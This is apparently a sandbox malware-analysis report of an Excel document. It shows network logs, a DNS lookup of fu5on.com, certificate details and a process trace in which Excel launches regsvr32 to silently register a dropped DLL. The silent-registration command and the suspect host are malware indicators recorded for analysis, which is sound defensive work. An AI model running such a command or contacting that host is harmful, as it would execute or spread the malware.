                                            Nov 29, 2020 05:53:43.849742889 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:43.849776030 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:43.850003004 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:43.864653111 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:43.993721008 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:43.994066954 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:45.396774054 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:45.565087080 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429472923 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429534912 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429575920 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429615974 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429626942 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429660082 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429665089 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429672003 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429676056 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429702044 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429702997 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429745913 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429779053 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429792881 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429794073 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429847002 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429867029 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429888010 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.429910898 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.429936886 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.435681105 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.435724974 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.558527946 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.558585882 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.558629036 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.558631897 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.558665991 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.558669090 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.558691025 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.558703899 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.558717012 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.558777094 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:49.563977003 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:49.564142942 CET49165443192.168.2.2267.212.179.162

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 05:53:43.419948101 CET5219753192.168.2.228.8.8.8
                                            Nov 29, 2020 05:53:43.557858944 CET53521978.8.8.8192.168.2.22
                                            Nov 29, 2020 05:53:44.347872972 CET5309953192.168.2.228.8.8.8
                                            Nov 29, 2020 05:53:44.375217915 CET53530998.8.8.8192.168.2.22
                                            Nov 29, 2020 05:53:44.388016939 CET5283853192.168.2.228.8.8.8
                                            Nov 29, 2020 05:53:44.415334940 CET53528388.8.8.8192.168.2.22
                                            Nov 29, 2020 05:53:44.914150953 CET6120053192.168.2.228.8.8.8
                                            Nov 29, 2020 05:53:44.949956894 CET53612008.8.8.8192.168.2.22
                                            Nov 29, 2020 05:53:44.962315083 CET4954853192.168.2.228.8.8.8
                                            Nov 29, 2020 05:53:44.997991085 CET53495488.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 29, 2020 05:53:43.419948101 CET192.168.2.228.8.8.80xfda2Standard query (0)fu5on.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 29, 2020 05:53:43.557858944 CET8.8.8.8192.168.2.220xfda2No error (0)fu5on.com67.212.179.162A (IP address)IN (0x0001)

                                            HTTPS Packets

                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                            Nov 29, 2020 05:53:43.849742889 CET67.212.179.162443192.168.2.2249165CN=fu5on.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Nov 09 01:37:15 CET 2020 Thu Mar 17 17:40:46 CET 2016Sun Feb 07 01:37:15 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                            CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:05:53:39
                                            Start date:29/11/2020
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f900000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:05:53:48
                                            Start date:29/11/2020
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                            Imagebase:0xff360000
                                            File size:19456 bytes
                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >